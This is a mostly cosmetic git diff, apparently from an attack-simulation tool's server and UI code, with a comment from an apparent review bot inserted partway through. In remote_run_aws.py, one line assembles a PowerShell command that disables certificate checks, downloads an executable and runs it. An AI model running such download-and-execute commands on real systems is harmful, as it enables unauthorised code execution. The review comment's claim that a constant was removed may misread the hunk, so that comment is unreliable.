@@ -22,17 +21,17 @@ class T1082(AttackTechnique): {'$project': {'_id': 0, 'machine': 1, 'collections': [ - {'used': {'$and': [{'$ifNull': ['$netstat', False]}, {'$gt': ['$aws', {}]}]}, - 'name': {'$literal': 'Amazon Web Services info'}}, - {'used': {'$and': [{'$ifNull': ['$process_list', False]}, {'$gt': ['$process_list', {}]}]}, - 'name': {'$literal': 'Running process list'}}, - {'used': {'$and': [{'$ifNull': ['$netstat', False]}, {'$ne': ['$netstat', []]}]}, - 'name': {'$literal': 'Network connections'}}, - {'used': {'$and': [{'$ifNull': ['$ssh_info', False]}, {'$ne': ['$ssh_info', []]}]}, - 'name': {'$literal': 'SSH info'}}, - {'used': {'$and': [{'$ifNull': ['$azure_info', False]}, {'$ne': ['$azure_info', []]}]}, - 'name': {'$literal': 'Azure info'}} - ]}}, + {'used': {'$and': [{'$ifNull': ['$netstat', False]}, {'$gt': ['$aws', {}]}]}, + 'name': {'$literal': 'Amazon Web Services info'}}, + {'used': {'$and': [{'$ifNull': ['$process_list', False]}, {'$gt': ['$process_list', {}]}]}, + 'name': {'$literal': 'Running process list'}}, + {'used': {'$and': [{'$ifNull': ['$netstat', False]}, {'$ne': ['$netstat', []]}]}, + 'name': {'$literal': 'Network connections'}}, + {'used': {'$and': [{'$ifNull': ['$ssh_info', False]}, {'$ne': ['$ssh_info', []]}]}, + 'name': {'$literal': 'SSH info'}}, + {'used': {'$and': [{'$ifNull': ['$azure_info', False]}, {'$ne': ['$azure_info', []]}]}, + 'name': {'$literal': 'Azure info'}} + ]}}, {'$group': {'_id': {'machine': '$machine', 'collections': '$collections'}}}, {"$replaceRoot": {"newRoot": "$_id"}}] diff --git a/monkey/monkey_island/cc/services/attack/technique_reports/T1086.py b/monkey/monkey_island/cc/services/attack/technique_reports/T1086.py index dd5d64d25..fe4b6ccec 100644 --- a/monkey/monkey_island/cc/services/attack/technique_reports/T1086.py +++ b/monkey/monkey_island/cc/services/attack/technique_reports/T1086.py 
@@ -6,7 +6,6 @@ __author__ = "VakarisZ" class T1086(AttackTechnique): - tech_id = "T1086" unscanned_msg = "Monkey didn't run powershell." scanned_msg = "" diff --git a/monkey/monkey_island/cc/services/attack/technique_reports/T1090.py b/monkey/monkey_island/cc/services/attack/technique_reports/T1090.py index 7a6c830b8..f5702ede8 100644 --- a/monkey/monkey_island/cc/services/attack/technique_reports/T1090.py +++ b/monkey/monkey_island/cc/services/attack/technique_reports/T1090.py @@ -6,7 +6,6 @@ __author__ = "VakarisZ" class T1090(AttackTechnique): - tech_id = "T1090" unscanned_msg = "Monkey didn't use connection proxy." scanned_msg = "" @@ -20,5 +19,3 @@ class T1090(AttackTechnique): data = T1090.get_base_data_by_status(status) data.update({'proxies': monkeys}) return data - - diff --git a/monkey/monkey_island/cc/services/attack/technique_reports/T1105.py b/monkey/monkey_island/cc/services/attack/technique_reports/T1105.py index 3d95fd88d..6ae8037bc 100644 --- a/monkey/monkey_island/cc/services/attack/technique_reports/T1105.py +++ b/monkey/monkey_island/cc/services/attack/technique_reports/T1105.py @@ -5,7 +5,6 @@ __author__ = "VakarisZ" class T1105(AttackTechnique): - tech_id = "T1105" unscanned_msg = "Monkey didn't try to copy files to any systems." scanned_msg = "Monkey tried to copy files, but failed." diff --git a/monkey/monkey_island/cc/services/attack/technique_reports/T1110.py b/monkey/monkey_island/cc/services/attack/technique_reports/T1110.py index 72bb0af76..a28dc5aeb 100644 --- a/monkey/monkey_island/cc/services/attack/technique_reports/T1110.py +++ b/monkey/monkey_island/cc/services/attack/technique_reports/T1110.py @@ -46,5 +46,3 @@ class T1110(AttackTechnique): data.update({'services': attempts}) return data - - diff --git a/monkey/monkey_island/cc/services/attack/technique_reports/T1188.py b/monkey/monkey_island/cc/services/attack/technique_reports/T1188.py index 32187696a..3959302fa 100644 
--- a/monkey/monkey_island/cc/services/attack/technique_reports/T1188.py +++ b/monkey/monkey_island/cc/services/attack/technique_reports/T1188.py @@ -6,7 +6,6 @@ __author__ = "VakarisZ" class T1188(AttackTechnique): - tech_id = "T1188" unscanned_msg = "Monkey didn't use multi-hop proxy." scanned_msg = "" diff --git a/monkey/monkey_island/cc/services/attack/technique_reports/T1210.py b/monkey/monkey_island/cc/services/attack/technique_reports/T1210.py index eeae183f5..5b9a23c62 100644 --- a/monkey/monkey_island/cc/services/attack/technique_reports/T1210.py +++ b/monkey/monkey_island/cc/services/attack/technique_reports/T1210.py @@ -6,7 +6,6 @@ __author__ = "VakarisZ" class T1210(AttackTechnique): - tech_id = "T1210" unscanned_msg = "Monkey didn't scan any remote services. Maybe it didn't find any machines on the network?" scanned_msg = "Monkey scanned for remote services on the network, but couldn't exploit any of them." @@ -30,8 +29,8 @@ class T1210(AttackTechnique): @staticmethod def get_scanned_services(): results = mongo.db.telemetry.aggregate([{'$match': {'telem_category': 'scan'}}, - {'$sort': {'data.service_count': -1}}, - {'$group': { + {'$sort': {'data.service_count': -1}}, + {'$group': { '_id': {'ip_addr': '$data.machine.ip_addr'}, 'machine': {'$first': '$data.machine'}, 'time': {'$first': '$timestamp'}}}]) diff --git a/monkey/monkey_island/cc/services/config.py b/monkey/monkey_island/cc/services/config.py index 641da8055..41c218099 100644 --- a/monkey/monkey_island/cc/services/config.py +++ b/monkey/monkey_island/cc/services/config.py @@ -15,7 +15,6 @@ __author__ = "itay.mizeretz" logger = logging.getLogger(__name__) - # This should be used for config values of array type (array of strings only) ENCRYPTED_CONFIG_ARRAYS = \ [ 
@@ -266,11 +265,11 @@ class ConfigService: # Check if array of shh key pairs and then decrypt if isinstance(config_arr[i], dict) and 'public_key' in config_arr[i]: config_arr[i] = ConfigService.decrypt_ssh_key_pair(config_arr[i]) if is_decrypt else \ - ConfigService.decrypt_ssh_key_pair(config_arr[i], True) + ConfigService.decrypt_ssh_key_pair(config_arr[i], True) else: config_arr[i] = encryptor.dec(config_arr[i]) if is_decrypt else encryptor.enc(config_arr[i]) else: - parent_config_arr[config_arr_as_array[-1]] =\ + parent_config_arr[config_arr_as_array[-1]] = \ encryptor.dec(config_arr) if is_decrypt else encryptor.enc(config_arr) @staticmethod diff --git a/monkey/monkey_island/cc/services/database.py b/monkey/monkey_island/cc/services/database.py index 62e370e44..7062d71c3 100644 --- a/monkey/monkey_island/cc/services/database.py +++ b/monkey/monkey_island/cc/services/database.py @@ -6,7 +6,6 @@ from monkey_island.cc.services.post_breach_files import remove_PBA_files from flask import jsonify from monkey_island.cc.database import mongo - logger = logging.getLogger(__name__) @@ -28,4 +27,3 @@ class Database(object): def init_db(): if not mongo.db.collection_names(): Database.reset_db() - diff --git a/monkey/monkey_island/cc/services/island_logs.py b/monkey/monkey_island/cc/services/island_logs.py index 77b28bdd4..be6aae12d 100644 --- a/monkey/monkey_island/cc/services/island_logs.py +++ b/monkey/monkey_island/cc/services/island_logs.py @@ -1,4 +1,5 @@ import logging + __author__ = "Maor.Rayzin" logger = logging.getLogger(__name__) diff --git a/monkey/monkey_island/cc/services/mimikatz_utils.py b/monkey/monkey_island/cc/services/mimikatz_utils.py index 4b88473fe..e2ab8ec10 100644 --- a/monkey/monkey_island/cc/services/mimikatz_utils.py +++ b/monkey/monkey_island/cc/services/mimikatz_utils.py @@ -1,4 +1,3 @@ - __author__ = 'maor.rayzin' 
diff --git a/monkey/monkey_island/cc/services/remote_run_aws.py b/monkey/monkey_island/cc/services/remote_run_aws.py index c81e0bc4a..9627bf74c 100644 --- a/monkey/monkey_island/cc/services/remote_run_aws.py +++ b/monkey/monkey_island/cc/services/remote_run_aws.py @@ -130,7 +130,7 @@ class RemoteRunAwsService: return r"[System.Net.ServicePointManager]::ServerCertificateValidationCallback = {" \ r"$true}; (New-Object System.Net.WebClient).DownloadFile('https://" + island_ip + \ r":5000/api/monkey/download/monkey-windows-" + bit_text + r".exe','.\\monkey.exe'); " \ - r";Start-Process -FilePath '.\\monkey.exe' -ArgumentList 'm0nk3y -s " + island_ip + r":5000'; " + r";Start-Process -FilePath '.\\monkey.exe' -ArgumentList 'm0nk3y -s " + island_ip + r":5000'; " @staticmethod def _get_run_monkey_cmd_line(is_linux, is_64bit, island_ip): diff --git a/monkey/monkey_island/cc/services/reporting/aws_exporter.py b/monkey/monkey_island/cc/services/reporting/aws_exporter.py index f0b6bdb6a..19293f991 100644 --- a/monkey/monkey_island/cc/services/reporting/aws_exporter.py +++ b/monkey/monkey_island/cc/services/reporting/aws_exporter.py @@ -208,9 +208,9 @@ class AWSExporter(Exporter): description="Protect {ssh_key} private key with a pass phrase.".format(ssh_key=issue['ssh_key']), recommendation="The machine {machine} ({ip_address}) is vulnerable to a SSH attack. The Monkey authenticated " "over the SSH protocol with private key {ssh_key}.".format( - machine=issue['machine'], - ip_address=issue['ip_address'], - ssh_key=issue['ssh_key']), + machine=issue['machine'], + ip_address=issue['ip_address'], + ssh_key=issue['ssh_key']), instance_arn=instance_arn, instance_id=issue['aws_instance_id'] if 'aws_instance_id' in issue else None ) 
@@ -224,8 +224,8 @@ class AWSExporter(Exporter): description="Update your Elastic Search server to version 1.4.3 and up.", recommendation="The machine {0}({1}) is vulnerable to an Elastic Groovy attack. The attack was made " "possible because the Elastic Search server was not patched against CVE-2015-1427.".format( - issue['machine'], - issue['ip_address']), + issue['machine'], + issue['ip_address']), instance_arn=instance_arn, instance_id=issue['aws_instance_id'] if 'aws_instance_id' in issue else None ) @@ -269,7 +269,7 @@ class AWSExporter(Exporter): recommendation="The machine {0} ({1}) is vulnerable to a ShellShock attack. " "The attack was made possible because the HTTP server running on TCP port {2} was vulnerable to a " "shell injection attack on the paths: {3}.".format( - issue['machine'], issue['ip_address'], issue['port'], issue['paths']), + issue['machine'], issue['ip_address'], issue['port'], issue['paths']), instance_arn=instance_arn, instance_id=issue['aws_instance_id'] if 'aws_instance_id' in issue else None ) @@ -284,9 +284,9 @@ class AWSExporter(Exporter): "network.".format(issue['username']), recommendation="The machine {0} ({1}) is vulnerable to a SMB attack. The Monkey authenticated over the SMB " "protocol with user {2} and its password.".format( - issue['machine'], - issue['ip_address'], - issue['username']), + issue['machine'], + issue['ip_address'], + issue['username']), instance_arn=instance_arn, instance_id=issue['aws_instance_id'] if 'aws_instance_id' in issue else None ) 
@@ -301,9 +301,9 @@ class AWSExporter(Exporter): "network.", recommendation="The machine machine ({ip_address}) is vulnerable to a WMI attack. The Monkey authenticated over " "the WMI protocol with user {username} and its password.".format( - machine=issue['machine'], - ip_address=issue['ip_address'], - username=issue['username']), + machine=issue['machine'], + ip_address=issue['ip_address'], + username=issue['username']), instance_arn=instance_arn, instance_id=issue['aws_instance_id'] if 'aws_instance_id' in issue else None ) @@ -318,9 +318,9 @@ class AWSExporter(Exporter): "network.".format(issue['username']), recommendation="The machine machine ({ip_address}) is vulnerable to a WMI attack. The Monkey used a " "pass-the-hash attack over WMI protocol with user {username}".format( - machine=issue['machine'], - ip_address=issue['ip_address'], - username=issue['username']), + machine=issue['machine'], + ip_address=issue['ip_address'], + username=issue['username']), instance_arn=instance_arn, instance_id=issue['aws_instance_id'] if 'aws_instance_id' in issue else None ) @@ -361,7 +361,7 @@ class AWSExporter(Exporter): description="This critical machine is open to attacks via strong users with access to it.", recommendation="The services: {services} have been found on the machine thus classifying it as a critical " "machine. These users has access to it:{threatening_users}.".format( - services=issue['services'], threatening_users=issue['threatening_users']), + services=issue['services'], threatening_users=issue['threatening_users']), instance_arn=instance_arn, instance_id=issue['aws_instance_id'] if 'aws_instance_id' in issue else None ) diff --git a/monkey/monkey_island/cc/services/reporting/exporter_init.py b/monkey/monkey_island/cc/services/reporting/exporter_init.py index f64d4b4aa..903af1628 100644 --- a/monkey/monkey_island/cc/services/reporting/exporter_init.py +++ b/monkey/monkey_island/cc/services/reporting/exporter_init.py 
@@ -4,6 +4,7 @@ from monkey_island.cc.services.reporting.report_exporter_manager import ReportEx from monkey_island.cc.services.reporting.aws_exporter import AWSExporter from monkey_island.cc.services.remote_run_aws import RemoteRunAwsService from monkey_island.cc.environment.environment import env + logger = logging.getLogger(__name__) diff --git a/monkey/monkey_island/cc/services/reporting/test_pth_report.py b/monkey/monkey_island/cc/services/reporting/test_pth_report.py index 7c709f862..b5a628fb1 100644 --- a/monkey/monkey_island/cc/services/reporting/test_pth_report.py +++ b/monkey/monkey_island/cc/services/reporting/test_pth_report.py @@ -64,6 +64,3 @@ class TestPTHReportServiceGenerateMapNodes(IslandTestCase): self.assertEqual(map_nodes[0]["group"], "critical") self.assertEqual(len(map_nodes[0]["services"]), 2) self.assertEqual(map_nodes[0]["hostname"], hostname) - - - diff --git a/monkey/monkey_island/cc/services/reporting/test_zero_trust_service.py b/monkey/monkey_island/cc/services/reporting/test_zero_trust_service.py index a43da8416..98b99ac13 100644 --- a/monkey/monkey_island/cc/services/reporting/test_zero_trust_service.py +++ b/monkey/monkey_island/cc/services/reporting/test_zero_trust_service.py @@ -306,7 +306,7 @@ class TestZeroTrustService(IslandTestCase): def compare_lists_no_order(s, t): - t = list(t) # make a mutable copy + t = list(t) # make a mutable copy try: for elem in s: t.remove(elem) diff --git a/monkey/monkey_island/cc/services/telemetry/processing/post_breach.py b/monkey/monkey_island/cc/services/telemetry/processing/post_breach.py index b0e2eb8b7..e6ac8734b 100644 --- a/monkey/monkey_island/cc/services/telemetry/processing/post_breach.py +++ b/monkey/monkey_island/cc/services/telemetry/processing/post_breach.py 
@@ -24,4 +24,3 @@ def process_post_breach_telemetry(telemetry_json): post_breach_action_name = telemetry_json["data"]["name"] if post_breach_action_name in POST_BREACH_TELEMETRY_PROCESSING_FUNCS: POST_BREACH_TELEMETRY_PROCESSING_FUNCS[post_breach_action_name](telemetry_json) - diff --git a/monkey/monkey_island/cc/services/telemetry/zero_trust_tests/segmentation.py b/monkey/monkey_island/cc/services/telemetry/zero_trust_tests/segmentation.py index b4efd3c3a..626a4cc52 100644 --- a/monkey/monkey_island/cc/services/telemetry/zero_trust_tests/segmentation.py +++ b/monkey/monkey_island/cc/services/telemetry/zero_trust_tests/segmentation.py @@ -9,7 +9,7 @@ from monkey_island.cc.models.zero_trust.segmentation_finding import Segmentation from monkey_island.cc.services.configuration.utils import get_config_network_segments_as_subnet_groups SEGMENTATION_DONE_EVENT_TEXT = "Monkey on {hostname} is done attempting cross-segment communications " \ - "from `{src_seg}` segments to `{dst_seg}` segments." + "from `{src_seg}` segments to `{dst_seg}` segments." SEGMENTATION_VIOLATION_EVENT_TEXT = \ "Segmentation violation! Monkey on '{hostname}', with the {source_ip} IP address (in segment {source_seg}) " \ @@ -101,8 +101,8 @@ def get_segmentation_done_event(current_monkey, subnet_pair): return Event.create_event( title="Segmentation test done", message=SEGMENTATION_DONE_EVENT_TEXT.format( - hostname=current_monkey.hostname, - src_seg=subnet_pair[0], - dst_seg=subnet_pair[1]), + hostname=current_monkey.hostname, + src_seg=subnet_pair[0], + dst_seg=subnet_pair[1]), event_type=EVENT_TYPE_MONKEY_NETWORK ) diff --git a/monkey/monkey_island/cc/services/version_update.py b/monkey/monkey_island/cc/services/version_update.py index 3d43017f6..c1dab52a9 100644 --- a/monkey/monkey_island/cc/services/version_update.py +++ b/monkey/monkey_island/cc/services/version_update.py 
@@ -54,4 +54,3 @@ class VersionUpdateService: @staticmethod def get_download_link(): return VersionUpdateService.VERSION_SERVER_DOWNLOAD_URL % (env.get_deployment(), env.get_version()) - diff --git a/monkey/monkey_island/cc/services/wmi_handler.py b/monkey/monkey_island/cc/services/wmi_handler.py index 2522b42dd..a802aabf1 100644 --- a/monkey/monkey_island/cc/services/wmi_handler.py +++ b/monkey/monkey_island/cc/services/wmi_handler.py @@ -5,7 +5,6 @@ __author__ = 'maor.rayzin' class WMIHandler(object): - ADMINISTRATORS_GROUP_KNOWN_SID = '1-5-32-544' def __init__(self, monkey_id, wmi_info, user_secrets): @@ -160,4 +159,3 @@ class WMIHandler(object): {'type': USERTYPE, 'entities_list': 1}) if entity_details.get('type') == GROUPTYPE: self.add_admin(entity_details, machine_id) - diff --git a/monkey/monkey_island/cc/ui/.babelrc b/monkey/monkey_island/cc/ui/.babelrc index 31130e826..7c92bc8e1 100644 --- a/monkey/monkey_island/cc/ui/.babelrc +++ b/monkey/monkey_island/cc/ui/.babelrc @@ -1,4 +1,10 @@ { - "presets": ["es2015", "stage-0", "react"], - "plugins": ["emotion"] + "presets": [ + "es2015", + "stage-0", + "react" + ], + "plugins": [ + "emotion" + ] } diff --git a/monkey/monkey_island/cc/ui/.eslintrc b/monkey/monkey_island/cc/ui/.eslintrc index b542daaf7..6b5cd85f9 100644 --- a/monkey/monkey_island/cc/ui/.eslintrc +++ b/monkey/monkey_island/cc/ui/.eslintrc @@ -19,14 +19,22 @@ }, "rules": { "comma-dangle": 1, - "quotes": [ 1, "single" ], + "quotes": [ + 1, + "single" + ], "no-undef": 1, "global-strict": 0, "no-extra-semi": 1, "no-underscore-dangle": 0, "no-console": 1, "no-unused-vars": 1, - "no-trailing-spaces": [1, { "skipBlankLines": true }], + "no-trailing-spaces": [ + 1, + { + "skipBlankLines": true + } + ], "no-unreachable": 1, "no-alert": 0, "react/jsx-uses-react": 1, diff --git a/monkey/monkey_island/cc/ui/karma.conf.js b/monkey/monkey_island/cc/ui/karma.conf.js index 87401bfe6..660cb8128 100644 --- a/monkey/monkey_island/cc/ui/karma.conf.js 
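Review bot: Deleting `ADMINISTRATORS_GROUP_KNOWN_SID = '1-5-32-544'` from `WMIHandler` in `wmi_handler.py` is a behavioural change inside an otherwise whitespace-only commit, and the hunk does not show whether any remaining code (for example the `add_admin` path in this file's second hunk) still references the attribute; please confirm it is unused before removing it, or keep it. If it is dead, a sentence in the commit message saying so would help the next reader. Note also that the removed value lacked the `S-` prefix of the well-known BUILTIN\Administrators SID (`S-1-5-32-544`), so a string comparison against a real SID would never have matched — if that check is re-implemented elsewhere, use the full form. The enclosing class continues outside the hunk.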
+++ b/monkey/monkey_island/cc/ui/karma.conf.js @@ -3,23 +3,23 @@ var webpackCfg = require('./webpack.config'); // Set node environment to testing process.env.NODE_ENV = 'test'; -module.exports = function(config) { +module.exports = function (config) { config.set({ basePath: '', - browsers: [ 'PhantomJS' ], + browsers: ['PhantomJS'], files: [ 'test/loadtests.js' ], port: 8000, captureTimeout: 60000, - frameworks: [ 'mocha', 'chai' ], + frameworks: ['mocha', 'chai'], client: { mocha: {} }, singleRun: true, - reporters: [ 'mocha', 'coverage' ], + reporters: ['mocha', 'coverage'], preprocessors: { - 'test/loadtests.js': [ 'webpack', 'sourcemap' ] + 'test/loadtests.js': ['webpack', 'sourcemap'] }, webpack: webpackCfg, webpackServer: { @@ -28,8 +28,8 @@ module.exports = function(config) { coverageReporter: { dir: 'coverage/', reporters: [ - { type: 'html' }, - { type: 'text' } + {type: 'html'}, + {type: 'text'} ] } }); diff --git a/monkey/monkey_island/cc/ui/server.js b/monkey/monkey_island/cc/ui/server.js index ec9182cde..49045359e 100644 --- a/monkey/monkey_island/cc/ui/server.js +++ b/monkey/monkey_island/cc/ui/server.js 
@@ -14,19 +14,19 @@ let isInitialCompilation = true; const compiler = webpack(config); new WebpackDevServer(compiler, config.devServer) -.listen(config.port, 'localhost', (err) => { - if (err) { - console.log(err); - } - console.log('Listening at localhost:' + config.port); -}); + .listen(config.port, 'localhost', (err) => { + if (err) { + console.log(err); + } + console.log('Listening at localhost:' + config.port); + }); compiler.plugin('done', () => { if (isInitialCompilation) { // Ensures that we log after webpack printed its stats (is there a better way?) setTimeout(() => { console.log('\n✓ The bundle is now ready for serving!\n'); - console.log(' Open in iframe mode:\t\x1b[33m%s\x1b[0m', 'http://localhost:' + config.port + '/webpack-dev-server/'); + console.log(' Open in iframe mode:\t\x1b[33m%s\x1b[0m', 'http://localhost:' + config.port + '/webpack-dev-server/'); console.log(' Open in inline mode:\t\x1b[33m%s\x1b[0m', 'http://localhost:' + config.port + '/\n'); console.log(' \x1b[33mHMR is active\x1b[0m. The bundle will automatically rebuild and live-update on changes.') }, 350); diff --git a/monkey/monkey_island/cc/ui/src/components/attack/MatrixComponent.js b/monkey/monkey_island/cc/ui/src/components/attack/MatrixComponent.js index 2e7ef4fc3..640032767 100644 --- a/monkey/monkey_island/cc/ui/src/components/attack/MatrixComponent.js +++ b/monkey/monkey_island/cc/ui/src/components/attack/MatrixComponent.js @@ -14,10 +14,10 @@ class MatrixComponent extends AuthComponent { }; // Finds which attack type has most techniques and returns that number - static findMaxTechniques(data){ + static findMaxTechniques(data) { let maxLen = 0; - data.forEach(function(techType) { - if (Object.keys(techType.properties).length > maxLen){ + data.forEach(function (techType) { + if (Object.keys(techType.properties).length > maxLen) { maxLen = Object.keys(techType.properties).length } }); 
@@ -25,18 +25,18 @@ class MatrixComponent extends AuthComponent { }; // Parses ATT&CK config schema into data suitable for react-table (ATT&CK matrix) - static parseTechniques (data, maxLen) { + static parseTechniques(data, maxLen) { let techniques = []; // Create rows with attack techniques for (let i = 0; i < maxLen; i++) { let row = {}; - data.forEach(function(techType){ + data.forEach(function (techType) { let rowColumn = {}; rowColumn.techName = techType.title; if (i <= Object.keys(techType.properties).length) { rowColumn.technique = Object.values(techType.properties)[i]; - if (rowColumn.technique){ + if (rowColumn.technique) { rowColumn.technique.name = Object.keys(techType.properties)[i] } } else { @@ -50,28 +50,28 @@ class MatrixComponent extends AuthComponent { }; getColumns(matrixData) { - return Object.keys(matrixData[0]).map((key)=>{ + return Object.keys(matrixData[0]).map((key) => { return { Header: key, id: key, accessor: x => this.renderTechnique(x[key].technique), - style: { 'whiteSpace': 'unset' } + style: {'whiteSpace': 'unset'} }; }); } renderTechnique(technique) { - if (technique == null){ - return (
) + if (technique == null) { + return (
) } else { return ( - - {technique.title} - - ) + + {technique.title} + + ) } }; @@ -85,20 +85,20 @@ class MatrixComponent extends AuthComponent { renderLegend = () => { return ( - ) + ) }; render() { @@ -110,7 +110,7 @@ class MatrixComponent extends AuthComponent { + defaultPageSize={tableData['maxTechniques']}/>
); } diff --git a/monkey/monkey_island/cc/ui/src/components/attack/techniques/Helpers.js b/monkey/monkey_island/cc/ui/src/components/attack/techniques/Helpers.js index 4d4f55dad..7b7215db0 100644 --- a/monkey/monkey_island/cc/ui/src/components/attack/techniques/Helpers.js +++ b/monkey/monkey_island/cc/ui/src/components/attack/techniques/Helpers.js 
@@ -1,57 +1,62 @@ import React from "react"; -export function renderMachine(val){ - return ( - {val.ip_addr} {(val.domain_name ? " (".concat(val.domain_name, ")") : "")} - ) +export function renderMachine(val) { + return ( + {val.ip_addr} {(val.domain_name ? " (".concat(val.domain_name, ")") : "")} + ) } /* Function takes data gathered from system info collector and creates a string representation of machine from that data. */ export function renderMachineFromSystemData(data) { - let machineStr = data['hostname'] + " ( "; - data['ips'].forEach(function(ipInfo){ - if(typeof ipInfo === "object"){ - machineStr += ipInfo['addr'] + ", "; - } else { - machineStr += ipInfo + ", "; - } - }); - // Replaces " ," with " )" to finish a list of IP's - return machineStr.slice(0, -2) + " )" + let machineStr = data['hostname'] + " ( "; + data['ips'].forEach(function (ipInfo) { + if (typeof ipInfo === "object") { + machineStr += ipInfo['addr'] + ", "; + } else { + machineStr += ipInfo + ", "; + } + }); + // Replaces " ," with " )" to finish a list of IP's + return machineStr.slice(0, -2) + " )" } /* Formats telemetry data that contains _id.machine and _id.usage fields into columns for react table. */ export function getUsageColumns() { - return ([{ - columns: [ - {Header: 'Machine', - id: 'machine', - accessor: x => renderMachineFromSystemData(x.machine), - style: { 'whiteSpace': 'unset' }, - width: 300}, - {Header: 'Usage', - id: 'usage', - accessor: x => x.usage, - style: { 'whiteSpace': 'unset' }}] - }])} + return ([{ + columns: [ + { + Header: 'Machine', + id: 'machine', + accessor: x => renderMachineFromSystemData(x.machine), + style: {'whiteSpace': 'unset'}, + width: 300 + }, + { + Header: 'Usage', + id: 'usage', + accessor: x => x.usage, + style: {'whiteSpace': 'unset'} + }] + }]) +} /* Renders table fields that contains 'used' boolean value and 'name' string value. 'Used' value determines if 'name' value will be shown. 
*/ -export function renderUsageFields(usages){ - let output = []; - usages.forEach(function(usage){ - if(usage['used']){ - output.push(
{usage['name']}
) - } - }); - return (
{output}
); - } +export function renderUsageFields(usages) { + let output = []; + usages.forEach(function (usage) { + if (usage['used']) { + output.push(
{usage['name']}
) + } + }); + return (
{output}
); +} export const ScanStatus = { - UNSCANNED: 0, - SCANNED: 1, - USED: 2 + UNSCANNED: 0, + SCANNED: 1, + USED: 2 }; diff --git a/monkey/monkey_island/cc/ui/src/components/attack/techniques/T1003.js b/monkey/monkey_island/cc/ui/src/components/attack/techniques/T1003.js index 24d742c14..ccebd3e7c 100644 --- a/monkey/monkey_island/cc/ui/src/components/attack/techniques/T1003.js +++ b/monkey/monkey_island/cc/ui/src/components/attack/techniques/T1003.js @@ -17,7 +17,8 @@ class T1003 extends React.Component {
{this.props.data.message}

{this.props.data.status === ScanStatus.USED ? - + : ""} ); diff --git a/monkey/monkey_island/cc/ui/src/components/attack/techniques/T1005.js b/monkey/monkey_island/cc/ui/src/components/attack/techniques/T1005.js index 6d46c2285..799b91d08 100644 --- a/monkey/monkey_island/cc/ui/src/components/attack/techniques/T1005.js +++ b/monkey/monkey_island/cc/ui/src/components/attack/techniques/T1005.js @@ -13,10 +13,17 @@ class T1005 extends React.Component { return ([{ Header: "Sensitive data", columns: [ - {Header: 'Machine', id: 'machine', accessor: x => renderMachineFromSystemData(x.machine), style: { 'whiteSpace': 'unset' }}, - {Header: 'Type', id: 'type', accessor: x => x.gathered_data_type, style: { 'whiteSpace': 'unset' }}, - {Header: 'Info', id: 'info', accessor: x => x.info, style: { 'whiteSpace': 'unset' }}, - ]}])}; + { + Header: 'Machine', + id: 'machine', + accessor: x => renderMachineFromSystemData(x.machine), + style: {'whiteSpace': 'unset'} + }, + {Header: 'Type', id: 'type', accessor: x => x.gathered_data_type, style: {'whiteSpace': 'unset'}}, + {Header: 'Info', id: 'info', accessor: x => x.info, style: {'whiteSpace': 'unset'}}, + ] + }]) + }; render() { return ( @@ -25,10 +32,10 @@ class T1005 extends React.Component {
{this.props.data.status === ScanStatus.USED ? : ""} ); diff --git a/monkey/monkey_island/cc/ui/src/components/attack/techniques/T1016.js b/monkey/monkey_island/cc/ui/src/components/attack/techniques/T1016.js index 63e2bb4a5..c5a02a8f7 100644 --- a/monkey/monkey_island/cc/ui/src/components/attack/techniques/T1016.js +++ b/monkey/monkey_island/cc/ui/src/components/attack/techniques/T1016.js @@ -1,7 +1,7 @@ import React from 'react'; import '../../../styles/Collapse.scss' import ReactTable from "react-table"; -import { renderMachineFromSystemData, renderUsageFields, ScanStatus } from "./Helpers" +import {renderMachineFromSystemData, renderUsageFields, ScanStatus} from "./Helpers" class T1016 extends React.Component { @@ -14,10 +14,16 @@ class T1016 extends React.Component { return ([{ Header: "Network configuration info gathered", columns: [ - {Header: 'Machine', id: 'machine', accessor: x => renderMachineFromSystemData(x.machine), style: { 'whiteSpace': 'unset' }}, - {Header: 'Network info', id: 'info', accessor: x => renderUsageFields(x.info), style: { 'whiteSpace': 'unset' }}, - ] - }])}; + { + Header: 'Machine', + id: 'machine', + accessor: x => renderMachineFromSystemData(x.machine), + style: {'whiteSpace': 'unset'} + }, + {Header: 'Network info', id: 'info', accessor: x => renderUsageFields(x.info), style: {'whiteSpace': 'unset'}}, + ] + }]) + }; render() { return ( @@ -26,10 +32,10 @@ class T1016 extends React.Component {
{this.props.data.status === ScanStatus.USED ? : ""} ); diff --git a/monkey/monkey_island/cc/ui/src/components/attack/techniques/T1018.js b/monkey/monkey_island/cc/ui/src/components/attack/techniques/T1018.js index dcf7687db..e54f4c89c 100644 --- a/monkey/monkey_island/cc/ui/src/components/attack/techniques/T1018.js +++ b/monkey/monkey_island/cc/ui/src/components/attack/techniques/T1018.js @@ -1,7 +1,7 @@ import React from 'react'; import '../../../styles/Collapse.scss' import ReactTable from "react-table"; -import { renderMachineFromSystemData, renderMachine, ScanStatus } from "./Helpers" +import {renderMachineFromSystemData, renderMachine, ScanStatus} from "./Helpers" class T1018 extends React.Component { @@ -10,9 +10,9 @@ class T1018 extends React.Component { super(props); } - static renderMachines(machines){ + static renderMachines(machines) { let output = []; - machines.forEach(function(machine){ + machines.forEach(function (machine) { output.push(renderMachine(machine)) }); return (
{output}
); @@ -21,12 +21,23 @@ class T1018 extends React.Component { static getScanInfoColumns() { return ([{ columns: [ - {Header: 'Machine', id: 'machine', accessor: x => renderMachineFromSystemData(x.monkey), style: { 'whiteSpace': 'unset' }}, - {Header: 'First scan', id: 'started', accessor: x => x.started, style: { 'whiteSpace': 'unset' }}, - {Header: 'Last scan', id: 'finished', accessor: x => x.finished, style: { 'whiteSpace': 'unset' }}, - {Header: 'Systems found', id: 'systems', accessor: x => T1018.renderMachines(x.machines), style: { 'whiteSpace': 'unset' }}, - ] - }])}; + { + Header: 'Machine', + id: 'machine', + accessor: x => renderMachineFromSystemData(x.monkey), + style: {'whiteSpace': 'unset'} + }, + {Header: 'First scan', id: 'started', accessor: x => x.started, style: {'whiteSpace': 'unset'}}, + {Header: 'Last scan', id: 'finished', accessor: x => x.finished, style: {'whiteSpace': 'unset'}}, + { + Header: 'Systems found', + id: 'systems', + accessor: x => T1018.renderMachines(x.machines), + style: {'whiteSpace': 'unset'} + }, + ] + }]) + }; render() { return ( @@ -35,10 +46,10 @@ class T1018 extends React.Component {
